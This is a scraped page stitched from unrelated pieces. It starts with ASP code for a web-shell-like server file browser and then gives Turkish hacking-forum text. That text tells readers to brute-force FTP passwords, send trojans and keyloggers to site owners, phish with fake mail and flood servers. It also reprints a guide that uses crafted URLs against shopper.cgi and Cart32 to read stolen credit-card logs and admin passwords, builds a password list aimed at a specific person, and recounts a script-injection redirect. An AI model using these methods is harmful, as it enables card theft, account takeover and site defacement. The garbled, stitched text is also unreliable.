BACKGROUND-COLOR: ?#?C0C0C0?
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
TD,INPUT,SELECT
{
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<body bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":"""
If InStr(UCase(FolderPath), Drive.DriveLetter & ":") > 0 Then Response.Write "
selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>"
style="width:100%">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>
<br>
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center"
style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder.Drive
& "")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder)%>"><font
face="wingdings" size="4">¶</font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href=
"<%=Request.ServerVariables("script_name") & "?FolderPath=" &
Server.URLPathEncode(FolderPath & SubFolder.Name & "")%>"><font face="wingdings"
size="4">0</font> <%=SubFolder.Name%></a> (<a href=
"<%=Request.ServerVariables("script_name")%>?C opyF olde r=<%=Server.URLPathEncode(FolderPath
& SubFolder.Name)%>&FolderPath=<%=Server.URLPathEnco de(FolderPath & "")%>">Copy</a>
</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModi fied%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)% > </td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href=
"showcode.asp?f=<%=File.Name%>&FolderPath=<%=S e rver.URLPathEncode(FolderPath)%>"
target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a
href=
"<%=Request.ServerVariables("script_name")%>?C opyF ile= <%=File.Name%>&FolderPath=<%=Server.URLPathEnco de(FolderPath
& "")%>">Copy</a> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td& amp; gt;
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified% ></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></ td>
</tr>
<%Next%>
</table>
</body>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
MinUpperBound, ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex
- 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function
Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "?#?efefef?"
Else
BgColor = "?#?ffffff?"
End If
End Sub
Private Function Attributes(AttributeValue)
Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
Attributes = lsResult
End Function
Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName, liCount, 1) = "." Then
lsExt = Right(FileName, Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function
Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString, 1) = "" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString, liCount, 1) = "" Then
ParseFolder = Left(PathString, liCount)
Exit For
End If
Next
End If
End Function
%>
Misafir
Genel Bilgiler
Posts
n/a
Threads
13732
_____Brute Force:_____
Bu teknik icin öncelikle dua edin ki ftp sifresi az haneli olsun.Brute force icin kullanabileceginiz program Brutus AET2 dir
ki bu tuzakonline.com'da mevcuttur.Brute force un mantigi cok basittir.Brutus olabilecek kombinasyonlari cok hizli bir
sekilde dener.Ama bu özellikle sifre cok haneliyse ki muhtemelen öyledir,çok uzun zaman alir.Başariya ulasma olasiligi
düşük olsa bile buldugu sifre nin calismama olasiligi yoktur .Size FTP sifresini verir.Buldugunuz sifre ile bence tüm
dosyalari silin kendi hazirladiginiz indexi koyun.
_____Wordlist:_____
Wordlistler icinde bir cok sözcügün bulundugu basit dosyalardir.Siz brute forcerlarla cok hizli bir sekilde elinizdeki
wordlistteki kelimeleri denersiniz.Wordlistler tahminen 5-10 bin kelimeden olusurlar ve eger elde etmeye calistiginiz ftp
sifresi bu wordlistler icindeyse sifreyi bulursunuz.Basariya ulasma olasiligi düsüktür.uldugu sifre nin calismama olasiligi
yoktur
_____Birebir Baglanti(trojanlar vs):_____
Lamer teknigidir bastan söylemem gerekli .Sitenin sahibiyle kurdugunuz basarili bir muhabbet sonucu elinizdeki trojan
serverini bence bir dosya ile birlestirip karsinizdaki kullaniciya yollayin.Site sahibinin makinasina baglandiktan sonra
bilgisayarina bir keylogger atin.Belirli araliklarla bilgisayarina girip log dosyasini kendi bilgisayariniza cekin.
Arada sitesinin passwordunu bulabilirsiniz.Bir diğer yöntem de Turkojan kullanarak mümkündür ki o daha saglikli dir.
Adamin bilgisayarina baglanip keyloggera calistirin .Sonra onunla sohbet edip bir sekilde sitesine ftp den erismesini
saglayin.Nasilsa sifresini girecektir.Sifresizce
not:Adamin sifreleri bilgisayarindaki password managerlarda kayitliysa yöntem basarisiz olur .Zaten eger basarili bir
webmastersa büyük ihtimalle serveri yemez .Site HTML falansa acik kullanamiyorsaniz deneyeblirsiniz.
_____Fakemail:_____
Selamlar.Mail site sahibi bakimindan büyük önem tasir.Genelde kullanilan Lame teknik adamin mailini hackleme hosttan sifre
istetmektir.Yine de denenebilen opsiyonlar arasindadir.Siteye Whois Cekip client maili(webmaster) hacklemeye calisin.
Hotmail,yahoo,usa.net,mynet fakemail kodlarini asagi yukari köklü her forumdan kolayca telep edebilirsiniz.ıcine lycostan bi
mail form kodu koyarsaniz rahatca adama fake atabilirsiniz.Fakat eger adamin maili POP3 falansa ki eger
webmasteradi@siteninadi.com ise muhtemelen öyledir tavsiyem kendi fake kodunuzu yazmanizdir.
____Flood:_____
Herhangi bir sunucu yada siteye kisa bir sürede cok fazla sayida account acarak yada mesaj göndererek o sunucu yada siteyi
servis dişi birakma teknigidir.HolyOne denyo launch forumlara clone sokarak flood yapmak icin birebir.Admiral programi
irc vs sunuculara kolaylıkla flood yapabilir.Bu teknigi birden fazla kisiyle,iyi bir internet baglantisiyla kullanmanizi tavsiye ederim
Yazıma başlamadan önce size bazı gerçeklerden bahsetmek istiyorum. Özellikle gerçekten bilimsel anlamda bilgisayar sektörü ile ilgilenmemişseniz, bu söyleyeceklerim sizin için altın değerinde olacaktır.
1. Kural : Hiçbir Hacker yada Saldırgan, sihirbaz değildir. Bir şekilde var olan bir açık varsa, o saldırgan, bilgi, yetenek, tecrübe ve şans kriterleri ile o açığı bulur ve kullanır. Her saldırganda bu kriterler aynı olmayacağı için bazıları için atak başarısız olur, bazılar için ise atak karşı tafa büyük hasarlar verir.
2. Kural : Tamamiyle güvenli sistem diye birşey yoktur.
3. Kural : Güvenlik işinde garanti yoktur.
Bu kurallar gerçekten altın niteliğinde. Eğer ki bunların doğru olduğunu bilerek düşünürseniz, yaptığınız işlerde ve yapacağınız yorumlarda bir çok şeyi kolayca elde edersiniz.
ınternet ortamı, bir çok bilgisayarın, farklı protokoller üzerinden birbirine bağlandığı, büyük bir paylaşım ağıdır. Bunu söylememin sebebi, satırlarımı doldurmak için değil. Burdaki önemli bir şeyi vurgulamak içindir. Az önceki cümlede “Paylaşım” denilen birşeyden bahsettim. Evet, ineternette bulunan her bilgisayar bir paylaşım içindedir...
şimdi kısaca internette bir web sitesi için gereken birimlerden bahsedeceğim.
Domian Name: Alan adıdır. Örneğin, Confidentialité- France bir Top-Level domaindir. “Spymastersnake.org” kısmı domainin adıdır. *.org kısmı domainin hangi level olduğunu belirtir. http://www.* kısmı ise, domainin gösterdiği Ipdeki www klasör veya hizmetinin yoludur. Domain Name her zaman bir Ipnin yerini alır. Bu IP ise bir bilgisayara ait olan, ve o bilgisayarın internete erişimini sağlayan numaradır. Her internete bağlanan makinaya verilen ve birbirinden farklı olan bu numaraya, internet protokolü numarası denir.
Host: ınterenete sürekli bağlı olan, belli bir ipsi olan ve içinde internette yayınlanacak dosyaları barındıran, multi-user işletim sistemi barındıran ve farklı kullanıcıların, biribirinden bağımsız kullanabilecekleri bir bilgisayardır. Eğer siz kendi bilgisayarınıza bu işletim sistemlerinden birini kurup, makinanızı ayarlarsanız bu makine sizinki bile olabilir.
Bu makinalarda web sunucusu dediğimiz programlar bulunur. Bu programlar sayesinde sizin herkese paylaşıma açacağınız internette yayınlayacağınız sitenin dosyalarını 80 numaralı port üzerinden yada başka bir port üzerinden web tarayıcılarının okuyabileceği şekilde yayınlanabilir.
Bir web sitesi aldığınızda, aldığınız yer size bir bilgisayarda hesap açar. Bu hesap sizin dosyalarını koyabileceğiniz bir hesaptır. Bu hesap sayesinde size izin verilen şeyleri yapabilirsiniz. Örneğin izin verilen miktarda dosyalarınızı koyabilir, yayınlayabilir veya karşı makinede dosyalarınızı çalıştırabilir, irc server gibi şeyler kurabilirsiniz. Yada şu anda geocities gibi yerlerin yaptığı sadece dosyalarınızı depo edip, yayınlanmasını sağlayabilirsiniz. Yani bu web yayımcılığının en temel ve basit işini yapmış olursunuz.
Ancak web yayımcılığı daha karmaşık ve daha çok şekilde yapılabilmekte. Bunları sağlayan şeylerin başında script dediğimiz, web browserlarından yollanan komutlarla karşı makinada çalışan uygulamalardır. Bir script, sınırlandırılmış bir *.exe uygulaması gibi çalışır. Belli bir yorumlayıcısı vardır ve tüm görevleri bu yorumlayıcı yapar. Scriptte ise bu yorumlayıcının anlayacağı komutlar vardır. Bu yüzden yaptığınız uygulamanın sınırları bu yorumlayıcının yeteneklerine bağlıdır. Bilinen en yaygın yorumlayıcılar ASP, PHP ve Perl yorumlayıcılarıdır.
Aynı şekilde size verilen bir hesapta, bazı normal *.exe uygulamaları yada ortamına göre sadece uygulama çalıştırabilir, bunlarla oyun serverları, chat serverları kurabilirsiniz. Elbette bu aldığınızın hostun yeteneklerine bağlıdır.
Böylece internete bağlı bir bilgisayarı bazı server uygulamaları sayesinde internette bilgi paylaşabilen bir sistem haline getirip, adına web sunucusu yada host demiş oluyoruz. Bir host içinde yüzlerce kullanıcı ve buna bağlı olarak yüzlerce web sitesi barındırabilir. Bunun böyle olması sağlayan şey ise Domain Name Server dediğimiz sistem ve Multi-User dediğimiz, işletim sistemleridir.
Kısaca bilmeyenler için, bir web sitesi için gereken bir server yazılımı ve internete bağlı bir bilgisayar diyebiliriz. Ancak gerçekte durum daha Complex bir haldedir. Bu complex yerleşim ise bu sistemleri iyi bilen kişiler için bazı avantajlar sağlamakta ve başkasının sahip olduğu sistemlere bile onların istemleri dışında hükmetme şansı vermektedir.
şimdi kısaca şu anda Türkiye’de Hack adı altında dolaşan, insanların Hack ettim diyerek övündüğü basit ve karmaşık olmayan sistemleri açıklamakta. Bunların başlıcaları şunlardır:
Mass Scannerlar: En yaygın olanı son dönemde budur. Bazı scannerlar, internetteki ipleri yani bilgisayarları tarayarak, onların paylaşım izni olup olmadığını ve ftp gibi protokolllerinde erişim izinlerine Anonymous kullanıcılara izin verip vermediğini kısa zamanda tarayıp bulan scannerlardır. Netbios ve Vulnerability scanner diye bir kaç türleri vardır. Kullanıcının bilgili biri olması gerekmez. Tek yapacağı ip aralığını girip tarama yapmasıdır. Aynı şekilde scriptlerdeki açıkları ve hataları bulmak hazırlanmış scannerlarda vardır. Bunlarla mesela, internette bulunan Alış-Veriş scriptlerinin bilinen açıkları veya Permission ayarları hatalarıyla kredi kartları bilgilerine ulaşım yapılmaktadır. Oldukça kolay ve basit birşeydir. Bir mass scanner çok iyi Up ve Down stream bağlantıya ihtiyaç duyar. DSL ve Tx bağlantılar biçilmiş kaftandır.
Eğer internette gecede 100-200 site hack ettik yada saatte 1000 site hack ettik gibi şeyler görürseniz, bunların Mass toolarla sadece butonlara basılarak yapıldığını rahatlıkla söyleyebilirsiniz. Özellikle bu hack edilen sitelerin bir ortak yanı olmaz. Diğelim bu 1000 siteyi hack etmiş adama 1 site adresi verseniz onu hack edemediğini görebilirsiniz. Çünkü kendi rastgele belli ip aralıklarını tarayarak bu işi yapmıştır, belki hack edilen sitelerin adını kendi bile daha önceden duymamıştır. Diyelimki sadece Amerikan sitelerini hack edicek biri, Amerikan hostlarının bulunduğu ve bulunabileceği, belli Amerikan IP aralıklarını tarama yapar ve içinde açıkların olduğu siteleri bularak işlemi yapar. Böylece saatte bağlantı hızına göre 1000 Amerikan sitesi hack edebilir. Ancak bu sitelerin çoğu uyduruk kişisel siteler olacaktır yada kendi çabasıyla hosting hizmeti vermeye çalışan deneyimsiz insanların siteleri olacaktır.
Başka bir şekilde de saatte yüzlerce site hack etmek mümkündür. Bunun için atak yapan şahıs, içinde yüzlerce hesabın bulunduğun bir Host’un açığını bulup, Root, Admin konumuna yada yetki düzeyi olacak bir konuma erişmiş ise tüm hesapları kitleyebilir yada hesapların indexlerine erişim varsa, hazırlayacağı ufak bir uygulama ile tüm indexleri değiştirebilir. Diyelim ki permission ayarları yapılmamış ve tüm kullanıcılarının Home klasörleri chmod 777 gibi bir izinle hazırlanmış bir hostta, açacağınız yada alacağınız bir hesapla, bir script yazmanız yada hostun işletim sistemine göre bir uygulama yazmanız sonucunda, tüm klasörlerdeki indexleri değiştirip, sistemi hack edilmiş havasına sokabilirsiniz. Bu işi eğer hostta 1000 site varsa, hepsine yapmış ve aynı anda yüzlercesini hack etmiş olursunuz... Bu verdiğim örnek bile en azından yetenek isteyen bir örnektir ancak yukarıda verilen tool örneği herkesin yapabileceği ve hali hazırda tüm hack sitelerinin kullanıcıların gözünü boyamak ve kendilerini tatmin etmek için kullandıkları yöntemdir. Bilgisayar bilimi hakkında bilgisi olmayan kişiler ise bu insanların arkasından gitmeye çalışmakta ve onların ağlarına düşmektedirler. Unutmayın ki bu iş sihirle yapılmıyor. Size mantığı açıklanmamış hiçbir hack girişimini gerçek sanmayın.
Fake Yollarla: Özellikle bedava siteler dağıtan geocities gibi yerlerden sitesi olan kişilerin sitelerini çalmak için kullanı.. yöntemdir. Kişinin mail adresine sahte şifre isteyen mailler yollanır yada user’ın hesabında şifreler denenir. Hiç bişey yapamayan lamer siteyi şikayet etmekte bulur çareyi. Eğer User ile bir chat ortamında bağlantısı varsa ona bir Trojan yada Keylogger yollayarak şifreyi almaya çalışır. ınternet kafe gibi ortamlarda user ve oturduğu makineleri takip ederek şifreyi almaya çalışır. Buda çok kullanı.. bir yöntem. Her zamanki gibi bilgisayar bilimi ile ilgisi olmayan kişilerin yolu veya karşısındaki user’ı bilgisi az olunca denen yoldur.
Script Açıkları: Bilinen scriptlerin açıklarıyla, sistemdeki bir şifreye ulaşarak yapı.. yöntemdir. Örneğin bir forum scriptinin admin şifresini ele geçirip, bu şifreyle sistemin diğer yerlerine ulaşıp, forumun anasayfasını değiştirme, şifre FTP şifresiyle aynı ise siteyi ele geçirme gibi, bilinen ve hala kullanı.. yöntemlerdir. Bunlar için bir örneği 2001 yılında yazıp yayınladığım kredi kartlarının çalınması ile ilgili bir yazıdan alıntı yaparak vermek istiyorum bu örnek Permission açıkları ile ilgili bölüm içinde geçerlidir.:
------------------------------------------------------------ ------------------
“..........ışte Log Kurulumlarından doğan açıklardan çıkan riskler...
Bu yöntemde zor olan tek bir yer var o da CClerin hangi program tarafından alınıp log edildiğini bulmak. Programı bulduktan sonra ise ona bazı parametreler girerek onun log dosyasını bulmak. Zor değil, kolay. Bazı web siteleri bile bu yöntemlerle hack ediliyor. Yapılması gereken şey scripte bazı parametreler girerek istenene ulaşmak.
şimdi, ilk iş kıytırık ama CC ile alışveriş yapı.. bir site bulmak ve bu sitenin CC verilerinin girildiği alana gitmek. Karşınıza CClerin girildiği form alanı gelince kaynağı görüntüleyip, içindeki POST methodunun bulunduğu yere bakın. Diyelim ki şu an zaten çalışan ve aktif olan Hire Workers Online! linkini POST verisinin yollanacağı yerde buldunuz. ışte o zaman bu durumda şans dileyip şunları deneyin:
Orda yazan URLyi kopayalaın, eğer URL yerinde "/cgi-local/shopper" yazıyorsa başına sitenin adresini koyun, yani Hire Workers Online! daha sonra URLyi browserınızın git çubuğuna yapıştırın. şimdi LOG'u bulmaya çalışcaz, ilk önce bu adrese şu TAGları ekliycez, Hire Workers Online! bu sayede scriptten bir arama yapmasını istiycez. Tabii ki arıycak ama ne? tabii ki ufak bir keyword, arama yapmamızın nedeni, log'u görüntülemek için başka şansımızın olmaması. Çünkü log'u print edecek bir girdi giremiyoruz, bunun için her zaman otomatik print yapan search tagını kullanıyoruz.
Bunun üstüne bir keyword girdisi ve üstüne de aranacak harfleri giriyoruz Hire Workers Online! ye şu an yeye yazdık ve yeye kelimesini aratmaya başladık ama nerde; Bunun için asıl karışık olan kısmı yapıcaz ve yapı.. alışverişlerin nerede LOGlandığını bulucaz. ışte bu durumda devreye zeka giriyor ve denemeye başlıyoruz.
Hire Workers Online! ye%20&template=sales.log diyoruz. Burdaki %20 boşluk anlamına, template ise aranacak kütüphane anlamına geliyor ve tabii ki sales.log ise aranacak olan döküman. Deniyoruz ve tabii ki olmuyor çünkü sales.log yok. O zaman devam ediyoruz ve oraya sales.log yerine sale.log yazıyoruz deniyoruz, olmazsa sell.log yazıyoruz, olmazsa order.log yazıyoruz ve tatam, oldu ışte bütün log karşınızda, yada şöyle diyim, bütün log değil yanlızca içinde yeye kelimesi olanlar karşınızda... Yukarda anlatılırken kullanı.. taglar değişebilir.
Mesela, ?search=actin yerine ?action=search olabilir. yada direkt ?search de olabilir bunu bilmeyeiz bu yüzen deniycez. Mesela keywords yerine keyword de olabilir. Sonuç URL Hire Workers Online! ye%20&template=order.log
şu ana kadar anlattığım Shopper.Cgi için olan açıktı. Birde Cart32.exe gibi windows için hazırlanmış olan scriptin açığı var. Onun hack edilmesi daha kolay.Cart32 kullanan bir sitede http://www.michaeljackson.com/cgi-bin/cart32.exe olarak scripti bulduğunuzda, bunu http://www.michaeljackson.com/cgi-b...herhangibisi-OR DERS.txt yada OUTPUT.txt olarak girerek CClere ulaşabilirsiniz. Tabii dediğim ORDERS başka bişi de olabilir ama genelde orders dır.
Ayrıca Cart32 de CC dışında:
Admin şifresi için-> http://www.michaeljackson.com/cgi-b...t32/)cart32.ini
Müşteri şifreleri için-> http://www.michaeljackson.com/cgi-b...cart32clientlis t
Bilgisyar Klasörünü görüntülemek için->
http://www.michaeljackson.com/cgi-bin/cart32/error
Unutmayın, michaeljackson.com yerine Vulnerable olan scriptin bulunduğu site adresi yazılacaktır. Pathler değişebilir ama v4.00 a kadar olan tüm scriptlerdeki açık aynı yöntem ve komutlarla sabit kalır.”
işiyi Kandırma: Yöntemlerin en ilginci budur J Karşınızdaki kişiyi, bir şekilde kandırıp, ondan bir mail şifresi yada buna benzer bir şey (gizli soru cevabı) alınarak şifreye ulaşma yoludur. Tavsiye edilmez....
Brute Ve Dict. Force: Bir dosya içine yazılmış şifrelerin bir programla denenmesi işlemine Dictionary Attack, var olabilecek tüm şifre kombinasyonlarının denenmesi olayına Brute Force Attack denir. Bu iki yöntem çok uzun sürecek yöntemlerdir. Eğer ki bekleyecek bir kaç yüz yılınız varsa sonuç alabilirsiniz J Ama hiç belli olmaz, kısa zamanda da sonuç alınabilir, hiç sonuçta alınmayabilir.
şimdi bir Dictionary Attack için şifre hazırlamak isteyenlere 2001 yılında yazmış olduğum şifre kırma mantığı ile ilgili yazımdan bir alıntıyı koymak istiyorum.
------------------------------------------------------------ ----------------------------------
“... ışte bu deneyeceğiniz şifreleri hazırlamada yardım edecek bir kaç şey anlatmak istiyorum. Bunları şu güne kadar yaşadığım olaylardan esinlenerek yazıyorum.
şimdi diyelim ki X (12-03-1984) yaşında olan Ali adında birinin Hotmailini kıracağız. Bu adamı az buçuk tanıyoruz. Mesela aynı okulda aynı sınıftasınız, ne kadar bu işlerden çaktığınıda biliyorsunuz. O zaman başalyalım. Bu adamında soyadı Veli olsun yani Ali Veli. Cep telefonuda 0 535 543 21 09 olsun.
Bu adam en basitinden şifresini bir 1984 koymak ister sonra olamdı der 19841984 koymak ister o da olmadı 12031984 koymak ister. Bunlarla doğum tarihine göre kombinasyonlar yapabiliriz. Daha çok seçenek var. En çok 19841984 tutar. Bu adamın şifresi 05355432109 olabilir. Yada 5432109 olabilir.
şifre VeliAli olabilir AliVeli olabilir, babasının adı Ahmet olsun, AhmetVeli olabilir. VeliAhmet olabilir. AlVel olabilir.Aliv84 olabilir. yada Galatasaraylı olsun benim gibi, o zaman GS84 olabilir. aliGS84 olabilir. AGS84 olabilir. Yada ev telefonuda olabilir.
Diyelim ki gizli sorusunu bulucaz. Soru yanlızca "ALIM" diye bir kelime. O zaman onun cevabı yukardakinin aynısı yani "ALIM" olabilir.
Yada şifre yedi tane 7 , üç tane 3 de olabilir. 54321 olabileceği gibi 123456789 da olabilir. 0000 da olabilir 9876543210 da olabilir.
Oturduğu apartman, şehir, sokak isimleride kullanılır. Annesinin kızlık soyadı. Yada okul numarası. Sonuçta kişi unutmamak için herkesin bildiği ve kullanı.. bazı numaralardan ve isimlerden bir kombinasyon yapmak isteycektir. Bizim burda yapmamaız gereken burda bu kişiye göre yapılabilecek kombinasyonları tahmin edip bir sözlük hazırlayarak. Dict. attack yapmak olacaktır. Baya uzun süren bir iş olabilir ama bu tarz şifreler kullanan biriyse kesin düşer zokaya.
Mesela bazı klavye oyunları vardır. Q klavyeler QWERTY harfleriyle başlar, bunlar rahatlıkla şifre olabilir. Yada QAZWSXEDC harfleride olabilir. Bakın bakalım bu harfler klavyede nasıl dizilmiş?
Yada rakamlardan 98745632210 olabilir. Bu sizin düşünce kabiliyetinize bağlı daha çok üretebilirsiniz.
Bu tarz klavye oyunlarıyla hazırlanmış, ayrıca kişiye özel olarakta hazırlanmış bir sözlüğün; sanıyorum ki başakalarının şifrelerini bulmakta büyük yararı olur, ki oluyor zaten.
Bazen şahıslar en sevdikleri hayvanı, eşyayı, şarkıcıyı, futbolcuyu falanda yazarlar.
Demek ki şahsi olan biligilere ve klavye oyunlarına dikkat etmemiz gerekiyormuş. Önemli olan kişi için kolay hatırlanabilecek bir şey yazmak. Herkes şifrelerini bu mantıkla bulur. Eminimki bu yazıyı okuyanlardan, yani sizlerden birileri de burda kendi şifresinin formülünüde görmüştür. Dedim ya herkes bu tarz şeyler kullanıyor. Ama bilmiyor ki bu yöntemleri bazıları zaten biliyor. ınsan mantığı işte, her yerde aynı...”
Bilgisayar Bilimiyle uğraşan yada bu işlerden daha çok anlayanların kullandılkları yöntemler:
Bu kişiler yukardaki yöntemleri kullanabilir ama yukardaki bilgileri kullanabilen kişiler bu yöntemleri kullanamaz...
Enjeksiyon Yöntemleri: Bilinen scriptler veya bilinmeyen scriptler içindeki açık ve hataları kullanarak, bir database’e kod girme yada benzeri bir kodun çalışmasını sağlamaktır. Örnek vermem gerekirse, 2003 mayıs ayında, bir siteyi bu yöntemle hack etmiştim. Site bir arama motoru koymuştu. Arama motorunda yazdığınız kelime en son arananlar diye bir liste çıkıyordu ve orda da ana sayfada gözüküyordu. Ancak aramaya girilen kelime “, \, /, <, > içerse bile bu içerilen HTML koduna aynen yazılıyordu. Yani Special Chars dediğimiz bu karakterler doğal halleriye yazılıyor &NbSp; gibi özel HTML dili ile yazılmıyordu. Bende arama kısmına ufak bir Java Script yönlendirme kodu girdim ve anasayfayı spymastersnake.org’a yönlendirdim. Böylece o siteye giren kişi 1 saniye sonra direkt bizim siteye yönlenmiş oluyordu.
Bu örnekte olduğu gibi, bazı forum scriptlerinin kullandığı DataBase’lere bazı kodlama hatalarından yararlanarak, değerler girilebiliyor. Bunların en ünlülerinden birisi, 2002 yılında bulunan Snitz forumları açığıdır.
Permission Açıkları: Gerek HTTP gerek FTP üzerinden olsun, bu açıklar her şekilde risk oluşturur. En güvenli sistem, Unix/Linux sistemidir. Bildiğiniz üzere Multi-User işletim sistemlerinde, bir dosyaya sizden başka kimin ulaşıp, ulaşamayacağını ayarlayabileceğiniz, Kernel tarafından yönetilen bir Permission Tablosu vardır. Linux ile bir örnekle açıklayayım:
Bir Linux makinada benim Home klasörüm “gokhan” olsun ve yolum aşağıdaki gibi olsun:
ıçinde de MichaelJackson.mp3 diye bir dosya olsun.
“ /etc/home/gokhan/spymastersnake/MichaelJackson.mp3”
Burdaki “etc” klasörü herkesin okumasına açık, ancak yazma işlemlerine kapalı bir klasördür. Ben klasörün içeriğini görebilirim ama içine dosya koyamam. Diyelimki “etc” altında BeatIt.mp3 isimli bir dosya olsun. Klasörün herkese açık okunabilir READ ayarı açık oldukça bu dosyayı alabilirim. Eğerki Herkese açık EXECUTE ayarı açıksa ben bu dosyayı Shell den komut girerek bir mp3 playerla açabilirim. Eğerki Dosyanın READ ayarı herkese kapalı ise ben sadece bu dosyayı okuyamam. Aynı şekilde dosyanın READ ayarı açık olursa fakat klasörün READ ayarı kapalı olursa “etc” klasörünün içi boş görünsede dosyanın direk yolu yani “/etc/BeatIt.mp3” girilirse ben bu dosyayı okuyabilirim. ışte burda anlattığım klasör ve dosya Permission ayarlarında bir kullanıcı bir klaörün READ ayarını kaldırarak o klasörün içindeki bir dosyanın erişime kapalı olduğu sanmaktadır. Halbuki burda erişime kapalı olan klasörün içeriğidir. Yani TOC dediğimiz Table Of Contets öğesidir. Ki bu öğe yine KERNEL tarafından düzenlenir. Elbette bu anlattıklarım Web serverları üzerinden yaptığınız istemler için değil, makinada sahip olduğunuz shell ile yada FTP ile yapabileceğiniz şeyler.
“gokhan” klasörü burda sadece benim grubuma yada bir değişle sadece bana açık olan kısımdır. Öyleki sadece yazma yetkisi Group ve Admin elindedir. Eğerki biri bu ayarı herkesin yazıp okuabileceği moda getirirse, bu “gokhan” klasörü halka mal olmuş umumi bir klasör olur J Ve sonuçta altında bulunan tüm dizinler riske girer. Bu tarz Permission hataları ile hacklenen yada veri kaçırı.. sitelerin sayısı saymakla bitmez. şu an hala Kredi Kartları çalınabiliyorsa bunun nedeni bu ayarların yapılamamasıdır.
